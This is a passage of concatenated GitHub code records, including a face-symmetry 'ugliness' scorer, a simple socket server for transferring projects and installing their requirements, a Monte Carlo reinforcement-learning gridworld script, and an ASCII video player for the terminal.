draw():\n global tree\n screen.fill((0, 0, 0))\n for w in tree:\n color_array = [0, 0, 0]\n\n # color manipulation\n dist = abs(w - Vec2(300, 300))\n color_array[0] = dist / 300 * 255\n color_array[1] = (300 - dist) / 300 * 255\n\n color_array = [int(j) for j in color_array]\n\n for i in range(len(color_array)):\n if color_array[i] > 255:\n color_array[i] = 255\n elif color_array[i] < 0:\n color_array[i] = 0\n\n color = tuple(color_array)\n pygame.draw.circle(screen, color, tuple(w), walker_size)\n pygame.display.flip()\n\n\nmy_loop = True\nwhile my_loop:\n # event handling\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n my_loop = False\n\n draw()\n","repo_name":"Mo0dy/Code4Fun","sub_path":"Projects/DiffusionViewer.py","file_name":"DiffusionViewer.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18193843291","text":"import math\nimport cv2\nimport dlib\nimport os\nimport matplotlib.pyplot as plt\n\n# landmarks that define the human face\n\n# JAW\nJAW_POINTS = [0, 16]\nLEFT_JAW_POINTS = [0, 7]\nRIGHT_JAW_POINTS = [9, 16]\n\n# Eyebrows\nRIGHT_EYEBROW_POINTS = [22, 26]\nLEFT_EYEBROW_POINTS = [17, 21]\n\n# Nose\nNOSE_POINTS = [27, 35]\nLEFT_NOSE_POINTS = [31, 33]\nRIGHT_NOSE_POINTS = [34, 36]\n\n# Eyes\nLEFT_EYE_POINTS = [36, 41]\nRIGHT_EYE_POINTS = [42, 47]\n\n# Mouths\nMOUTH_POINTS = [48, 60]\nRIGHT_MOUTH_POINTS = [52, 53, 54, 55, 56]\nLEFT_MOUTH_POINTS = [48, 49, 50, 58, 59]\n\n# Lips\nLIPS_POINTS = [61, 67]\nLEFT_LIPS_POINTS = [60, 61, 67]\nRIGHT_LIPS_POINTS = [63, 64, 65]\n\nSYMMETRY_LINE_POINTS = [27, 28, 29, 30, 33, 51, 62, 66, 57, 8]\n\nFACE_FEATURES = [\"jaw\",\n \"eyes\",\n \"eye_brows\",\n \"nose\",\n \"mouth\",\n \"lips\"\n ]\n\n# Richard Reference ratio\nRICHARD_RATIO_JAW = 0.84\nRICHARD_RATIO_EYES = 1.239\nRICHARD_RATIO_EYE_BROWS = 2.654\nRICHARD_RATIO_NOSE = 1.288\nRICHARD_RATIO_MOUTH = 0.817\nRICHARD_RATIO_LIPS = 0.797\nRICHARD_RATIO = [RICHARD_RATIO_JAW, RICHARD_RATIO_EYES, RICHARD_RATIO_EYE_BROWS,\n RICHARD_RATIO_NOSE, RICHARD_RATIO_MOUTH, RICHARD_RATIO_LIPS]\n\n\ndef printCoordinate(start, end, landmarks):\n for i in range(start, end):\n x = landmarks.part(i).x\n y = landmarks.part(i).y\n\n print(\"point : 
\", i, \"x : \", x, \"y : \", y)\n\n\ndef getAllFileInFolder(folderPath):\n imagesPath = []\n\n for root, directories, files in os.walk(folderPath):\n for file in files:\n filePath = os.path.join(root, file)\n if file.endswith(\".png\"):\n imagesPath.append(filePath)\n\n if file.endswith(\".jpg\"):\n imagesPath.append(filePath)\n\n if file.endswith(\".jpeg\"):\n imagesPath.append(filePath)\n\n return imagesPath\n\n\ndef getFaceLandmarks(image):\n # Load the detector\n detector = dlib.get_frontal_face_detector()\n\n # Load the predictor\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n # Change color space\n imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(imageRGB, cv2.COLOR_BGR2GRAY)\n\n faces = detector(imageRGB)\n\n for face in faces:\n x1 = face.left()\n x2 = face.right()\n y1 = face.top()\n y2 = face.bottom()\n\n # cv2.rectangle(img=image, pt1=(x1, y1), pt2=(x2, y2), color=(0, 255, 0), thickness=4)\n\n # Look for the landmarks\n landmarks = predictor(image=gray, box=face)\n\n return landmarks\n\n\ndef getDistance(x1, y1, x2, y2):\n deltaX = x2 - x1\n deltaY = y2 - y1\n\n return math.sqrt(math.pow(deltaX, 2) + math.pow(deltaY, 2))\n\n\ndef estimateUgliness(landmarks):\n personRatioFeaturesList = getAllFaceFeaturesRatio(landmarks)\n faceFeaturesRatio = {}\n faceFeatureRatioList = []\n\n for featureIndex in range(0, len(FACE_FEATURES)):\n personRatio = personRatioFeaturesList[featureIndex]\n\n faceFeature = FACE_FEATURES[featureIndex]\n\n richardRatio = RICHARD_RATIO[featureIndex]\n\n percentageFeature = compareRatio(richardRatio, personRatio)\n\n faceFeaturesRatio[faceFeature] = percentageFeature\n\n faceFeatureRatioList.append(percentageFeature)\n\n beautyPercentage = averageValue(faceFeatureRatioList)\n uglinessPercentage = 100 - beautyPercentage\n\n return uglinessPercentage\n\n\ndef getUglinessFromImage(imagePath):\n name = getFileName(imagePath)\n\n image = cv2.imread(imagePath)\n\n personLandmarks = getFaceLandmarks(image)\n\n personUglinessPercentage = estimateUgliness(personLandmarks)\n\n personUglinessOn10 = percentageTo10(personUglinessPercentage)\n\n return personUglinessOn10\n\n\ndef getFileName(filePath):\n filename = os.path.basename(filePath)\n separator = '.'\n name = filename.split(separator, 1)[0]\n return name\n\n\ndef compareRatio(richardRatio, personRatio):\n if richardRatio > personRatio:\n return round(((100 * personRatio) / richardRatio), 2)\n else:\n return round(((100 * richardRatio) / personRatio), 2)\n\n\ndef drawFeaturesPoint(landmarks, image):\n # Draw the points\n\n for i in range(0, 68):\n x = landmarks.part(i).x\n y = landmarks.part(i).y\n\n # Draw a circle\n cv2.circle(img=image, center=(x, y), radius=4, color=(0, 255, 0), thickness=-1)\n\n\ndef getAllFaceFeaturesRatio(landmarks):\n featureRatio = []\n\n for feature in FACE_FEATURES:\n featureRatio.append(symmetryRatioFaceFeature(landmarks, feature))\n\n return featureRatio\n\n\ndef symmetryRatioFaceFeature(landmarks, faceFeature):\n faceFeaturesCoordinates = getAllCoordinateFaceFeature(landmarks)\n centerFaceX = getCenterFaceX(landmarks)\n ratioFeatureList = []\n\n if faceFeature == FACE_FEATURES[0]:\n faceCoordinateIndex = 0\n\n elif faceFeature == FACE_FEATURES[1]:\n faceCoordinateIndex = 1\n\n elif faceFeature == FACE_FEATURES[2]:\n faceCoordinateIndex = 2\n\n elif faceFeature == FACE_FEATURES[3]:\n faceCoordinateIndex = 3\n\n elif faceFeature == FACE_FEATURES[4]:\n faceCoordinateIndex = 4\n\n elif faceFeature == FACE_FEATURES[5]:\n 
faceCoordinateIndex = 5\n\n leftFeatureCoordinate_X = faceFeaturesCoordinates[faceCoordinateIndex][0]\n leftFeatureCoordinate_Y = faceFeaturesCoordinates[faceCoordinateIndex][1]\n\n rightFeatureCoordinate_X = faceFeaturesCoordinates[faceCoordinateIndex][2]\n rightFeatureCoordinate_Y = faceFeaturesCoordinates[faceCoordinateIndex][3]\n\n for index in range(0, len(leftFeatureCoordinate_X)):\n leftPoint_X = leftFeatureCoordinate_X[index]\n leftPoint_Y = leftFeatureCoordinate_Y[index]\n\n rightPoint_X = rightFeatureCoordinate_X[index]\n rightPoint_Y = rightFeatureCoordinate_Y[index]\n\n centerPoint_Y = centerOfPoints([leftPoint_Y, rightPoint_Y])\n\n leftDistance = getDistance(leftPoint_X, leftPoint_Y, centerFaceX, centerPoint_Y)\n rightDistance = getDistance(rightPoint_X, rightPoint_Y, centerFaceX, centerPoint_Y)\n ratio = leftDistance / rightDistance\n ratio = round(ratio, 3)\n ratioFeatureList.append(ratio)\n\n return averageValue(ratioFeatureList)\n\n\ndef centerOfPoints(coordinates):\n sumOfCoordinates = 0\n\n for number in coordinates:\n sumOfCoordinates += number\n\n return sumOfCoordinates / len(coordinates)\n\n\ndef getCoordinateFaceFeature(feature, landmarks):\n leftCoordinateFeature_X = []\n leftCoordinateFeature_Y = []\n\n rightCoordinateFeature_X = []\n rightCoordinateFeature_Y = []\n\n coordinates = []\n\n if feature == \"jaw\":\n index_points_beginning = LEFT_JAW_POINTS[0]\n index_points_end = LEFT_JAW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_JAW_POINTS[0]\n index_points_end = RIGHT_JAW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"eyes\":\n index_points_beginning = LEFT_EYE_POINTS[0]\n index_points_end = LEFT_EYE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_EYE_POINTS[0]\n index_points_end = RIGHT_EYE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"eye_brows\":\n\n index_points_beginning = LEFT_EYEBROW_POINTS[0]\n index_points_end = LEFT_EYEBROW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n 
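# pair the y-coordinate with the x-coordinate of the same left-eyebrow landmark\n            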
pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_EYEBROW_POINTS[0]\n index_points_end = RIGHT_EYEBROW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"nose\":\n\n index_points_beginning = LEFT_NOSE_POINTS[0]\n index_points_end = LEFT_NOSE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_NOSE_POINTS[0]\n index_points_end = RIGHT_NOSE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"mouth\":\n\n for point_index in LEFT_MOUTH_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n for point_index in RIGHT_MOUTH_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"lips\":\n\n for point_index in LEFT_LIPS_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n for point_index in RIGHT_LIPS_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n\ndef averageValue(valueList):\n sumRatio = 0\n for ratio in valueList:\n sumRatio += ratio\n\n average = sumRatio / len(valueList)\n return round(average, 3)\n\n\ndef getCenterFaceX(landmarks):\n sumPoint = 0\n\n for pointIndex in SYMMETRY_LINE_POINTS:\n x = landmarks.part(pointIndex).x\n sumPoint += x\n\n return 
sumPoint / len(SYMMETRY_LINE_POINTS)\n\n\ndef getAllCoordinateFaceFeature(landmarks):\n leftCoordinateFeature_X = []\n leftCoordinateFeature_Y = []\n\n rightCoordinateFeature_X = []\n rightCoordinateFeature_Y = []\n\n COORDINATES_EYES = []\n COORDINATES_EYE_BROWS = []\n COORDINATES_NOSE = []\n COORDINATES_MOUTH = []\n COORDINATES_LIPS = []\n COORDINATES_JAW = []\n\n # coordinates of Jaws points\n COORDINATES_JAW = getCoordinateFaceFeature(FACE_FEATURES[0], landmarks)\n\n # Coordinates of Eyes points\n COORDINATES_EYES = getCoordinateFaceFeature(FACE_FEATURES[1], landmarks)\n\n # Coordinates of eye_brows points\n COORDINATES_EYE_BROWS = getCoordinateFaceFeature(FACE_FEATURES[2], landmarks)\n\n # Coordinates of Nose points\n COORDINATES_NOSE = getCoordinateFaceFeature(FACE_FEATURES[3], landmarks)\n\n # Coordinates of mouth points\n COORDINATES_MOUTH = getCoordinateFaceFeature(FACE_FEATURES[4], landmarks)\n\n # Coordinates of lips points\n COORDINATES_LIPS = getCoordinateFaceFeature(FACE_FEATURES[5], landmarks)\n\n faceFeaturesCoordinates = [COORDINATES_JAW, COORDINATES_EYES, COORDINATES_EYE_BROWS, COORDINATES_NOSE,\n COORDINATES_MOUTH, COORDINATES_LIPS]\n\n return faceFeaturesCoordinates\n\n\ndef emptyCoordinateList(list_x, list_y):\n list_x[:] = []\n list_y[:] = []\n\n\ndef percentageToScale(percentage, scaleLimit):\n scale = (percentage * scaleLimit) / 100\n\n return round(scale)\n\n\ndef percentageTo10(percentage):\n return percentageToScale(percentage, 10)\n\n\ndef showImage(image):\n cv2.imshow(\"Face\", mat=image)\n\n # Wait for a key press to exit\n cv2.waitKey(delay=0)\n\n # Close all windows\n cv2.destroyAllWindows()\n\n\ndef showImageTime(image, time):\n cv2.imshow(\"Picture\", mat=image)\n\n # Wait for a key press to exit\n cv2.waitKey(delay=time*1000)\n\n # Close all windows\n cv2.destroyAllWindows()\n\n# # Resize Image\n# resized = cv2.resize(image, (RESIZED_WIDTH, RESIZED_HEIGHT))\n\n# # Rotate image\n# image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)\n\n\n# # Other ways of rotating\n# rows, cols = image.shape[:2]\n# deg = 45\n\n\n# # (col/2,rows/2) is the center of rotation for the image\n# # M is the coordinates of the center\n# M = cv2.getRotationMatrix2D((cols/2, rows/2), deg, 1)\n# image = cv2.warpAffine(image, M, (cols, rows))\n\n# # Show image\n# plt.imshow(image)\n# plt.show()\n\n# Save image\n# cv2.imwrite(\"richardSavedTest.jpg\", image)\n","repo_name":"KennethSidibe/compare-ugliness","sub_path":"compareUgliness.py","file_name":"compareUgliness.py","file_ext":"py","file_size_in_byte":15630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13016217307","text":"import os\nimport traceback\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom colorama import Fore\nfrom subprocess import Popen, PIPE\nimport shutil\n\n\nclass SendProject:\n def __init__(self, conn=None):\n self.PATH = 'C:\\\\Users\\\\akuzm\\\\PycharmProjects\\\\'\n self.projects = os.listdir(self.PATH)\n if conn is not None:\n self.conn = conn\n else:\n self.server = socket(AF_INET, SOCK_STREAM)\n self.server.bind(('', 5008))\n self.server.listen()\n self.conn, addr = self.server.accept()\n print('Connected to', conn, addr)\n\n def run(self):\n try:\n with self.conn:\n print(Fore.GREEN, 'Connection: ', str(self.conn), end='')\n print(Fore.RESET)\n self.conn.send('|'.join(self.projects).encode('utf-8'))\n otv = self.conn.recv(1024).decode('utf-8')\n if otv.split()[0] == 'new':\n self.PATH += otv.split()[1]\n os.makedirs(self.PATH)\n elif 
otv.split()[0] == 'save':\n self.send_zip(otv.split()[1])\n raise Exception\n else:\n self.PATH += otv\n files = self.conn.recv(1024).decode('utf-8').split('|')\n\n for file_name in files:\n file = self.receive_file()\n self.save_file(file, file_name)\n print(f'Save file - {file_name}\\n---------------------------')\n f_req = self.conn.recv(1024).decode('utf-8')\n if int(f_req):\n data = self.create_venv()\n else:\n data = 'Packages not installed'.encode('cp1125')\n self.conn.sendall(data)\n print(Fore.GREEN, 'OK')\n\n except Exception as ex:\n print(Fore.RED, traceback.format_exc(), ex, Fore.RESET)\n\n def receive_file(self):\n full_size = self.conn.recv(1024).decode('utf-8')\n self.conn.send(b' ')\n print(Fore.BLUE, full_size, Fore.RESET)\n full_size = int(full_size)\n size = 0\n file = b''\n while size < full_size:\n data = self.conn.recv(1024)\n size += len(data)\n file += data\n self.conn.send(b' ')\n return file\n\n def send_zip(self, branch):\n print('start create zip and send')\n path = 'D:\\\\server\\\\zip\\\\' + branch\n shutil.make_archive(path, 'zip', self.PATH + branch)\n print('zip created')\n size = os.path.getsize(path + '.zip')\n self.conn.send(str(size).encode('utf-8'))\n self.conn.recv(1)\n with open(path + '.zip', 'rb') as file:\n self.conn.sendall(file.read())\n os.remove(path + '.zip')\n print('OK')\n\n def save_file(self, data, file_name):\n s = file_name.split('\\\\\\\\')\n path = self.PATH + '\\\\\\\\'.join(s[:-1])\n print(path, 'path')\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n with open(self.PATH + '\\\\' + file_name, 'wb') as file:\n file.write(data)\n\n def create_venv(self):\n command = f'cd {self.PATH}\\npip install -r requirements.txt\\npip list\\n'\n process = Popen(\"powershell.exe\", shell=False, stdin=PIPE, stdout=PIPE, stderr=PIPE, text=False)\n d1, d2 = process.communicate(command.encode('cp1125'))\n print('ok')\n return d1 + d2\n\n\nif __name__ == '__main__':\n server = SendProject()\n # server.PATH = server.PATH + 'super'\n # print(server.create_venv().decode('cp1125'))\n server.run()\n server.conn.close()\n","repo_name":"Aleksey3000/start_server","sub_path":"send/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14588514245","text":"import pygame\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom RL_2_YuanyangForMC import YuanYangEnv\n\n\nclass MC_RL:\n def __init__(self, yuanyang):\n self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions))) * 0.1\n self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n self.actions = yuanyang.actions\n self.yuanyang = yuanyang\n self.gamma = yuanyang.gamma\n\n def greedy_policy(self, qfun, state):\n amax = qfun[state, :].argmax()\n return self.actions[amax]\n\n def epsilon_greedy_policy(self, qfun, state, epsilon):\n amax = qfun[state, :].argmax()\n if np.random.uniform() < 1 - epsilon:\n return self.actions[amax]\n else:\n return self.actions[int(random.random() * len(self.actions))]\n\n def find_anum(self, a):\n for i in range(len(self.actions)):\n if a == self.actions[i]:\n return i\n\n def mc_learning_ei(self, num_iter):\n yuanyang = self.yuanyang\n self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions)))\n self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n for iter1 in range(num_iter):\n s_sample = []\n a_sample = []\n r_sample = []\n s = 
self.yuanyang.reset()\n            a = self.actions[int(random.random() * len(self.actions))]\n            done = False\n            step_num = 0\n\n            if self.mc_test() == 1:\n                print('Exploring starts: iterations needed to complete the task for the first time:', iter1)\n                break\n            # Collect data: s0-a1-s1-a2-s2 ... terminal state\n            while done == False and step_num < 30:\n                s_next, r, done = self.yuanyang.transform(s, a)\n                a_num = self.find_anum(a)\n                # Going back to a visited state is unreasonable, so give a negative reward\n                if s_next in s_sample:\n                    r = -10\n                s_sample.append(s)\n                a_sample.append(a_num)\n                r_sample.append(r)\n                step_num += 1\n                s = s_next\n                a = self.greedy_policy(self.qvalue, s)\n            # Compute the discounted cumulative return\n            # g(s_0)\n            a = self.greedy_policy(self.qvalue, s)\n            g = self.qvalue[s, self.find_anum(a)]\n            for i in range(len(s_sample) - 1, -1, -1):\n                g *= self.gamma\n                g += r_sample[i]\n            # g = G(s1, a)\n            for i in range(len(s_sample)):\n                self.n[s_sample[i], a_sample[i]] += 1.0\n                self.qvalue[s_sample[i], a_sample[i]] = \\n                    (self.qvalue[s_sample[i], a_sample[i]] * (self.n[s_sample[i],\n                                                                     a_sample[i]] - 1) + g) / self.n[s_sample[i],\n                                                                                                     a_sample[i]]\n                g -= r_sample[i]\n                g /= self.gamma\n        return self.qvalue\n\n    def mc_learning_on_policy(self,num_iter,epsilon):\n        yuanyang = self.yuanyang\n        self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions)))\n        self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n        for iter1 in range(num_iter):\n            s_sample=[]\n            r_sample=[]\n            a_sample=[]\n            s=0\n            done=False\n            step_num=0\n            epsilon=epsilon*np.exp(-iter1/1000)\n            while done == False and step_num < 30:\n                a=self.epsilon_greedy_policy(self.qvalue, s, epsilon)\n                s_next,r,done=yuanyang.transform(s,a)\n                a_num=self.find_anum(a)\n                # Going back to a visited state is unreasonable, so give a negative reward\n                if s_next in s_sample:\n                    r = -2\n                s_sample.append(s)\n                a_sample.append(a_num)\n                r_sample.append(r)\n                step_num += 1\n                s = s_next\n            if self.mc_test() == 1:\n                print('Iterations needed to complete the task for the first time:', iter1)\n                break\n            a=self.epsilon_greedy_policy(self.qvalue,s,epsilon)\n            g=self.qvalue[s,self.find_anum(a)]\n            for i in range(len(s_sample)-1,-1,-1):\n                g*=self.gamma\n                g+=r_sample[i]\n\n            for i in range(len(s_sample)):\n                self.n[s_sample[i],a_sample[i]]+=1.0\n                self.qvalue[s_sample[i],a_sample[i]]= \\n                    (self.qvalue[s_sample[i], a_sample[i]] * (self.n[s_sample[i],\n                                                                     a_sample[i]] - 1) + g) / self.n[s_sample[i],\n                                                                                                     a_sample[i]]\n                g -= r_sample[i]\n                g /= self.gamma\n        return self.qvalue\n\n    def mc_test(self):\n        s = 0\n        s_sample = []\n        done = False\n        flag = 0\n        step_num = 0\n        while False == done and step_num < 30:\n            a = self.greedy_policy(self.qvalue, s)\n            s_next, r, done = self.yuanyang.transform(s, a)\n            s_sample.append(s)\n            s = s_next\n            step_num += 1\n        if s == 9:\n            flag = 1\n        return flag\n\n\nif __name__ == '__main__':\n    yuanyang = YuanYangEnv()\n    brain = MC_RL(yuanyang)\n    qvalue1 = brain.mc_learning_on_policy(num_iter=5000,epsilon=0.7)\n    yuanyang.action_value = qvalue1\n    flag = 1\n    s = 0\n    step_num = 0\n    path = []\n    while flag:\n        path.append(s)\n        yuanyang.path = path\n        a = brain.greedy_policy(qvalue1, s)\n        print('%d -> %s' % (s, a), qvalue1[s, 0], qvalue1[s, 1], qvalue1[s, 2], qvalue1[s, 3])\n        yuanyang.bird_male_position = yuanyang.state_to_position(s)\n        yuanyang.render()\n        time.sleep(0.2)\n        step_num += 1\n        s_, r, t = yuanyang.transform(s, a)\n        if t == True or step_num > 30:\n            flag = 0\n        s = s_\n\n    yuanyang.bird_male_position = yuanyang.state_to_position(s)\n    path.append(s)\n    yuanyang.render()\n    while True:\n        
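# (added) keep the pygame window alive by re-rendering the final path\n        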
yuanyang.render()\n","repo_name":"309James/RL","sub_path":"RL_4_Monte_Carlo.py","file_name":"RL_4_Monte_Carlo.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37797785950","text":"import argparse\nimport curses\nimport math\nimport time\nimport typing\n\nimport set_root_path # noqa\nfrom image2ascii.frame_converter import FrameConverter\n\nimport cv2\nimport numpy as np\nimport pafy\n\n\"\"\"\nTODO: clear terminal using ANSI codes for rewriting existing lines\n\"\"\"\n\nDELTA = 0.000001\n\n\nOUTPUT_WIDTHS_BY_LABEL = {\n \"XS\": 36,\n \"S\": 78,\n \"M\": 120,\n \"L\": 162,\n \"XL\": 204,\n \"XXL\": 246,\n \"XXXL\": 288}\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Play video in terminal as ascii frames.')\n parser.add_argument(\n 'source',\n type=str,\n help='\"webcam\" or youtube url')\n parser.add_argument(\n 'size',\n type=str,\n choices=list(OUTPUT_WIDTHS_BY_LABEL.keys()),\n help='output size')\n parser.add_argument(\n '--invert-brightness',\n '-i',\n dest='invert_brightness',\n action='store_const',\n const=True,\n default=False)\n parser.add_argument(\n '--flip-horizontally',\n '-f',\n dest='flip_horizontally',\n action='store_const',\n const=True,\n default=False)\n args = parser.parse_args()\n return args\n\n\ndef get_video_capture(source: str) -> cv2.VideoCapture:\n target_frame_duration: float\n target_framerate: int\n\n # get source stream\n if source == \"webcam\":\n video_capture = cv2.VideoCapture(0)\n else:\n vPafy = pafy.new(source)\n play = vPafy.getbest()\n video_capture = cv2.VideoCapture(play.url)\n return video_capture\n\n\ndef get_frame_index_for_time_elapsed(\n target_framerate: int, time_elapsed: float):\n \"\"\"\n Based on time elapsed and frame rate, figure out which frame we\n should be showing\n \"\"\"\n return math.floor(time_elapsed * target_framerate)\n\n\ndef play_video(\n video_capture: cv2.VideoCapture,\n window,\n downsample_factor: int) -> None:\n frame_converter = FrameConverter(\n downsample_factor=downsample_factor,\n window=window)\n\n # init timing variables\n target_framerate = round(video_capture.get(cv2.CAP_PROP_FPS))\n target_frame_duration = 1 / target_framerate\n last_frame_time: typing.Optional[float] = None\n this_frame_time: typing.Optional[float] = None\n\n # we start at frame 1 instead of 0 because we read the first\n # frame to get the video dimensions\n current_frame_index = 1\n video_start_time = time.time()\n\n # read from stream\n while (True):\n if args.source != \"webcam\":\n # For youtube, we try to show video at original speed\n time_elapsed = time.time() - video_start_time\n expected_frame_index = get_frame_index_for_time_elapsed(\n target_framerate, time_elapsed)\n if expected_frame_index > current_frame_index:\n frames_to_skip = expected_frame_index - current_frame_index\n for i in range(frames_to_skip):\n video_capture.read()\n current_frame_index = expected_frame_index\n elif expected_frame_index < current_frame_index:\n # we're running ahead: wait a bit and loop again\n time.sleep(target_frame_duration / 2)\n continue\n\n # display frame\n has_frame, frame = video_capture.read()\n if not has_frame:\n break\n current_frame_index += 1\n if args.flip_horizontally:\n frame = np.flip(frame, 1)\n rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n ascii_frame = frame_converter.convert_frame_to_ascii(\n rgb_frame, invert_brightness=args.invert_brightness)\n 
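# (added) show the converted frame; the pacing above keeps YouTube playback\n        # at source speed: e.g. at 30 fps, 1.5 s elapsed maps to frame\n        # floor(1.5 * 30) = 45, so frames are skipped if conversion falls behind\n        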
frame_converter.print_frame(ascii_frame)\n\n # display performance stats\n last_frame_time = this_frame_time\n this_frame_time = time.time()\n time_elapsed = this_frame_time - video_start_time\n duration = (\n this_frame_time - last_frame_time\n if last_frame_time is not None else None)\n actual_framerate = (\n round(1 / (duration + DELTA))\n if duration is not None\n else target_framerate)\n window.addstr(f\"\\nFramerate: {actual_framerate}fps\")\n window.addstr(\"\\n<Press any key to exit>\")\n window.refresh()\n char = window.getch()\n if char != -1:\n break\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n video_capture = get_video_capture(args.source)\n has_frame, frame = video_capture.read()\n original_width = frame.shape[1]\n output_width = OUTPUT_WIDTHS_BY_LABEL[args.size]\n downsample_factor = math.ceil(original_width / output_width)\n output_height = int(frame.shape[0] / downsample_factor)\n\n # setup window with hidden cursor\n w = curses.initscr()\n w.nodelay(1)\n curses.curs_set(0)\n\n error = None\n try:\n play_video(video_capture, w, downsample_factor)\n except Exception as e:\n error = e\n w.erase()\n w.refresh()\n curses.endwin()\n if error is not None:\n print(\n \"Encountered error: most likely, the window is too small \"\n \"for the output size selected.\")\n","repo_name":"drigberg/image2ascii","sub_path":"commands/play_video.py","file_name":"play_video.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7972513104","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport urllib\nimport json\nimport datetime\nimport 